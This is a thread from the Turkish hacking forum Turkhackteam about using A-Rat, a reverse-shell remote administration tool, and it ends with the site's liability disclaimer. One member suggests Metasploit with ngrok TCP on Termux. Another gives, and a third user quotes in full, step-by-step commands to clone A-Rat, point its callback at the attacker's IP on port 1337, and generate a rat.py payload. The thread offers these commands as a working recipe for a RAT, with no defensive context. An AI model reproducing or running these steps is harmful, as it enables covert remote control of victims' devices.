A-Rat Nasıl Kullanılır?

14 Tem 2021
21
8
24
eğer güzel bir rat programı istiyorsan met@sploiti dene ben bayılıyorum sadece 550 mb yer kaplıyor ngrok tcp ile kullanıyorum termux için uyumlu hiçbir sıkıntı çekmessin

ne dersin...

Profesör

Kadim Üye
10 Nis 2020
5,088
1,608
-Türkistan-
Merhaba değerli üye;

A-Rat dediğiniz sanırım aşağıdaki tool.Yukarıda da önerildiği gibi kullanmanızı tavsiye edeceğim [email protected]ımı termux için basit ve aşırı kullanışlı.

A-Rat nasıl kullanılır?

apt update

apt upgrade

apt install git

apt install python2

apt install python

git clone GitHub - RexTheGod/A-Rat: A-Rat ( Remote Administration Tools ) Based Reverse Shell Coded By ./Xi4u7 Use 'help' To Tutorial :)

cd A-Rat

chmod +x *

python2 A-Rat.py

help

set host 127.0.0.1 [your ip]

set port 1337

set output /$HOME/rat.py

generate

Yukarıdaki komutları tek tek çalıştırarak toolu kullanabilirsiniz.

14 Tem 2021
21
8
24
Merhaba değerli üye;

A-Rat dediğiniz sanırım aşağıdaki tool.Yukarıda da önerildiği gibi kullanmanızı tavsiye edeceğim [email protected]ımı termux için basit ve aşırı kullanışlı.

A-Rat nasıl kullanılır?

apt update

apt upgrade

apt install git

apt install python2

apt install python

git clone GitHub - RexTheGod/A-Rat: A-Rat ( Remote Administration Tools ) Based Reverse Shell Coded By ./Xi4u7 Use 'help' To Tutorial :)

cd A-Rat

chmod +x *

python2 A-Rat.py

help

set host 127.0.0.1 [your ip]

set port 1337

set output /$HOME/rat.py

generate

Yukarıdaki komutları tek tek çalıştırarak toolu kullanabilirsiniz.
sana tamamen katılıyorum dostum...

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.